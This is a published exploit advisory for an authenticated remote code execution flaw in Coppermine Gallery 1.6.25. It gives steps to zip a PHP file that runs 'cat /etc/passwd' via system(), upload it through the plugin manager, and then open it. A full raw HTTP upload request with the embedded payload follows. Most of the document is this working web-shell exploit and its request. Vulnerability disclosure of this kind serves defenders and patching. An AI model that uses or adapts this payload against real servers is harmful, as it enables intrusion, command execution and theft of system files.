Headline
Coppermine Gallery 1.6.25 Remote Code Execution
Coppermine Gallery version 1.6.25 remote code execution exploit.
Exploit Title: coppermine-gallery 1.6.25 RCEApplication: coppermine-galleryVersion: v1.6.25 Bugs: RCETechnology: PHPVendor URL: https://coppermine-gallery.net/Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zipDate of found: 05.09.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip.$ cat >> test.php <?php echo system('cat /etc/passwd'); ?>$ zip test.zip test.php1. Login to account2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php3. Upload zip file4. Visit to php file http://localhost/cpg1.6.x-1.6.25/plugins/test.phppoc requestPOST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1Host: localhostContent-Length: 630Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342cConnection: close------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="plugin"; filename="test.zip"Content-Type: application/zipPK�����™b%Wz½µ}(���(�����test.phpUT �ñòödÓòödux���������<?php echo system('cat /etc/passwd');?>PK�����™b%Wz½µ}(���(������������¤����test.phpUT�ñòödux���������PK������N���j�����------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="form_token"50982f2e64a7bfa63dbd912a7fdb4e1e------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="timestamp"1693905214------WebKitFormBoundaryi1AopwPnBYPdzorF--